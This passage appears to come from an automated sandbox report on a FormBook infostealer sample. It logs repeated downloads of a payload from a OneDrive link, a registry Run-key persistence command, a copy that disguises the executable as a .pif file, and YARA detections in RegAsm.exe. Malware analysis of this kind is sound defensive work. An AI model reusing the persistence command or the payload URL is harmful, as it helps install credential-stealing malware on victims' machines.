                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:18 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:18 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-fqg89
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 2935FCB38F184E86A17FF352E9505947 Ref B: BN3EDGE0616 Ref C: 2024-07-23T12:49:18Z
                                                            Date: Tue, 23 Jul 2024 12:49:17 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54970613.107.137.114436180C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:49:33 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:49:34 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mUBDVxFL0Km4dF6fb4nRGW7ZdjXIi96DMwMDKod96AJlGSBshmayLs2aYjkMajC8mdc4HRzWHAgIcDSJPiH_JdOuFxJ2usqP2YgHb6XTEQTux3BsCY8tt-_oMmKZtHo-wuMHyokrHeEPQCyze6t6OkqtZ7AF4WWKRN5LWAhMW4q12K67tsVBZ2nqSsJLTsMxP9ugVcMpDbE4MbVIvpZXBZA/1336?download&psid=1
                                                            Set-Cookie: E=P:FO8O5xWr3Ig=:VBGFQJuwEnmTLcg7P7ACz3QvXIEeMKUSdHx0ZBuPpf0=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=eacd8d01-6a3b-4f8c-9055-b9007a13533d&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:33 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:34 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-4r4mg
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 9798D21CCCD94855A052B7EB5DE21ECE Ref B: BN3EDGE0715 Ref C: 2024-07-23T12:49:33Z
                                                            Date: Tue, 23 Jul 2024 12:49:34 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54971613.107.137.114433840C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:49:42 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:49:43 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mfqQtLozj-9TM6Ba0WtMrYNaZZLYdZifHt7JSgEAwVuBfWo_gNuWKsrXMDkmnGIRA0cG5FuFHrIfpRICMFZfHoG8IE55Eut8d-PRO-LGsqGertC-_YxpZqpkopn3OerOQs1CCMpnBmmffUswTT4BTTzm7Iiodtw3gmr-oX_p5tqfmpXOYOpLJxIAjs_wp5mh1pM3Gnp5QZ8LqiMBTIToIIg/1336?download&psid=1
                                                            Set-Cookie: E=P:NGhp7BWr3Ig=:Jz8q192T5rK6i8LXNtgQVmr+d1ovYoiaSaKj8LEvK58=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=8dc66c6a-5c89-4064-9a44-306e43368f28&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:42 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:43 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-vw84v
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 43B8FF83EF254E7895A925C3A115F70F Ref B: BN3EDGE0208 Ref C: 2024-07-23T12:49:42Z
                                                            Date: Tue, 23 Jul 2024 12:49:42 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.54971813.107.137.114436436C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:49:54 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:49:54 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mUzOlIfy49nah4fKlzCWhYlTPZUFu9vAgDNS-S_X2t_nL0Y-9XGqjLW3kaagbac6FGeSujISYiqn8BzuMz0Hyvc_oodwJjz_d7X825emRpaTdVvUumJuV-Q1HF1YgQ4jGpZr8Wc8SFpt3KIrFfvOjWX3DF5kEy80rleGOmrZy7TcxO7_W80jH_h2sVkAbwdjDDh3FGNTupNUo2p9gybOGbQ/1336?download&psid=1
                                                            Set-Cookie: E=P:18wi8xWr3Ig=:dWvH0WTJitfTUJ4KF+7+K2HQr2Z/lhhh3uDhTRtFriI=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=9228e1df-d7cb-4223-afa8-71453f70621e&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:54 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:54 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-c4dpk
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: FDC33A6A127E4DE8B6F5758F53D8EFC7 Ref B: BN3EDGE0809 Ref C: 2024-07-23T12:49:54Z
                                                            Date: Tue, 23 Jul 2024 12:49:54 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.54972013.107.139.114435480C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:50:09 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:50:10 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mE8p9HhoIpPnY2ZSkO-k2QoyiDP1eEVixXoeiZO3gSa-GRM46_Yn-B7ipY2YArCUEXMbzS0jCbLSAwIYGzRwTwkvUXqgbpLt_sfrFQ2t9CbfIM13GEK-j2Bw37G_aIUK80UtufByI7Dv3iEQlq4jdVTglElukksYr1qT0qYuU94kj-S8y8evhed-fwHpxWzdeFExh6JuSm262iQK-cqz8zw/1336?download&psid=1
                                                            Set-Cookie: E=P:GD12/BWr3Ig=:hdzz1Vbz1O2YEHrle52sBV/gfldeUhGm0BwUy0GycAw=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=f8e7a1a7-278a-4d4b-a0ac-7e23d7b1d586&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:09 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:10 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-c4dpk
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 0639599D363041FF9202B14959ACE0E4 Ref B: BN3EDGE0806 Ref C: 2024-07-23T12:50:09Z
                                                            Date: Tue, 23 Jul 2024 12:50:09 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.54972413.107.139.114433596C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:50:19 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:50:20 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mmRCyddZd8TgumTkc0WgJGPW0Be2KAP8RA1AGW9Yg-qGmwy0u0VLZAuymVEdH6LS2hunPfbQa7Y1U_7jZif9lk_B22Shn64OiUwpXdPJ8JhB0pewOhd59wFVEYaupOMWpD_DmPCg68qZxJekp6vjll6NDHxnQSbRFlUjIi-RbVmxZ6KNCc4nNtWf7LBcTvFklYr9m5BhztalIC6ouEy5KoQ/1336?download&psid=1
                                                            Set-Cookie: E=P:0xuIAhar3Ig=:wfox8g52O2phG/bveGS6hXV8eeggcb4x75WPkmRaMC4=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=99938a5a-b8a5-49af-8692-54fa982fa467&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:19 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:20 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-9xdkw
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: C791950761AB41D5BB08AD0884127577 Ref B: BN3EDGE1008 Ref C: 2024-07-23T12:50:19Z
                                                            Date: Tue, 23 Jul 2024 12:50:20 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.54972613.107.139.114435000C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:50:30 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:50:30 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mo4p-JVtoRBSqHrQiA9KeG1S6nMOtlwjW-1eDspeJcYnm3M5qDvMNKDA9M8fz9FBKVFRpIcYs9k1YQpyhl8h75Emp2jnmGBT3gNu0O5K_9I_Fu9j2vSz4mbjL0OLd7cqhqRLVzAt_TSzSQi6j5fqCGjn0mPkwZ9rXrQf0j6EGE7KLc_wQ8CDEbhZQDkBby1KNC1Omwz1708n3gsE1enuaBA/1336?download&psid=1
                                                            Set-Cookie: E=P:Kwa2CBar3Ig=:HxZ3IcT03royBW2bXc8MbQWL2xclplGWd+l2QJDLiTI=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=1bf5ebe6-233f-4568-a831-8bdd0b890d0b&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:30 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:30 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-n9mr8
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: DB7681309EE74B6CAB08463CCFCDEB0D Ref B: BN3EDGE0417 Ref C: 2024-07-23T12:50:30Z
                                                            Date: Tue, 23 Jul 2024 12:50:30 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.54973113.107.139.114436476C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:50:45 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:50:45 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mP83fG79GWrLdMGamez0hrTjn2wKcdfccPJocaqFvFmy0YwM8XhejQeyEmWBqIIPJ4xs9LXEkpj_o4KrH50yMbeBOlAQHzBa2ik_KEaFUkt01u3kPPSjNu_ONhGKfZw2xv0ya9Bjy-WyPP5UlGFUBLfliOZ783puOsDd-P--OHFWJhONBZvsh8h2UO7HpuP_Bt1l-YemcNtxbWckY_uIoaA/1336?download&psid=1
                                                            Set-Cookie: E=P:VGuKERar3Ig=:0WJ3tCd42pdh2rk9UZzG/COtpfdx3gZpIr1H6JrFH2U=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=fd39969b-f6a5-4f39-9789-de006a28eacf&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:45 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:45 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-q5pxf
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: DFBB582289984EDDACB1F0F2481E1F55 Ref B: BN3EDGE0417 Ref C: 2024-07-23T12:50:45Z
                                                            Date: Tue, 23 Jul 2024 12:50:44 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.54973813.107.139.114434012C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:50:53 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:50:53 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4m4LKvhJ_pTnz9rawaJjs2KZErvU8neZdJYfN9Hc3hkDV_oDM8LwyhXl_csc1M6IVr9j39XcRd2c3JH5ifRWcHnG96-DkFbmRC6M0IEX29mWAGvY_XTsGaeHEJQqjdk0qZZruqZEYr2Nb7DYr2g7GTfPM5m7O6Y4M0rLAz-7PfXpxvp_dUo3N8NEojuATgtxcEIA0PcLjYIhMj8lppZmEvNw/1336?download&psid=1
                                                            Set-Cookie: E=P:8BJ4Fhar3Ig=:0eArn1GrFjzOopzvwvL9povNbUb+muyTJ6tF+TjsO5g=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=50d05305-be3d-4c2c-acb3-1956eff24084&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:53 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:53 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-88qx4
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 360545862FEF4472A4EA8CAD8C56BB5D Ref B: BN3EDGE1108 Ref C: 2024-07-23T12:50:53Z
                                                            Date: Tue, 23 Jul 2024 12:50:53 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.54975013.107.139.114435244C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:51:06 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:51:07 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4m55yNyrfmR788IlgrTwCE-wIZNwJTU2JVOtkkPb1qgGdeCZ2PORv3tzG8rnttZ1cBKL04EkX2-vwddORg2bHrj19D0NiIXLgs7Ip-Kas_RqNKLXnXQPDX-cUF96UNTYBgT0hPsPvovmD0orrFaH33g6_KnParegKGJfSApXH130JRCQ6Bkp-xYeKcsqKnCR7u52QCSFVUy3RsjmoMBAC6qA/1336?download&psid=1
                                                            Set-Cookie: E=P:TQxRHhar3Ig=:OgmSgQ1MPc3HOXzaE6ZEO3Gvc8XcUh63cGYZMTv8Mo0=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=48db18a0-0f25-40a9-a580-9c8b0ae205f7&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:11:06 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:51:07 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-8kfpv
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 0F96CA3D93AD422AB7535245645963C3 Ref B: BN3EDGE0915 Ref C: 2024-07-23T12:51:06Z
                                                            Date: Tue, 23 Jul 2024 12:51:06 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            10192.168.2.54975413.107.139.11443
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:51:15 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:51:15 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mYBTVl_EZSczCNLvo6UnuN8mIkFvxYrYueuwLpcEaD5fKAGhPXGGNWygHS093fm7Ar9ni1AuO8Vco9R4ysQrwvtojC8NUn9YKvcyOuy4HPNMG695BHaejdO-XplPW_ieGWk7e8cnUQOQO2iGOZlDe4kG7S3L7YlJm4mOjotIMXh7JflXSzkjcYtGZaognOORAFSpQIa3bssdMpCwByFKXUg/1336?download&psid=1
                                                            Set-Cookie: E=P:LoyIIxar3Ig=:KzBdRhrwS9vAQd2rXTg6KISV9Y4yXU8hF3EMt3hlYXY=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=1032a074-696c-4bfe-9b3c-8eed3b1f1a4e&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:11:15 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:51:15 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-k5psb
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 0E5148A7C10840968CABC15320A30772 Ref B: BN3EDGE0220 Ref C: 2024-07-23T12:51:15Z
                                                            Date: Tue, 23 Jul 2024 12:51:15 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            11192.168.2.54975613.107.139.11443
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:51:23 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:51:24 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4myujGNEKaXc3HxIkx_ELXT2vVTE9jsfC4Wl6vz2jHQ6AvU5wQxlWg93vv2Lk0Q9-jZiWc5DNxrSFAq8RPtRIGok1vMy9R8bJdmJgIAPmYGAlNXL_f7zRrODcEXDPWngbOillL8fmIt_qK8DSkU4Io2ZqyS8Kbrp1EaJlC-4YX8aOhVMNk3UZhlDDZhY4PkOAHj8-O2PN5bHiiOeqzCHOwEA/1336?download&psid=1
                                                            Set-Cookie: E=P:y9KyKBar3Ig=:2u2WimKKfgdAd4kNuz9u5qOW/4Y4omjcFEbZIIsD6Gs=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=ee9cce3b-e89f-41cb-85a8-60ba39791cf7&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:11:24 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:51:24 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-88qx4
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 848B0147D81A4BE3BB7E66BEBEDDC956 Ref B: BN3EDGE0721 Ref C: 2024-07-23T12:51:23Z
                                                            Date: Tue, 23 Jul 2024 12:51:24 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:08:49:15
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Desktop\4Ear91jgQ7.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\4Ear91jgQ7.exe"
                                                            Imagebase:0x470000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:08:49:19
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:08:49:19
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:08:49:19
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:08:49:21
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:08:49:21
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:08:49:22
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xb90000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
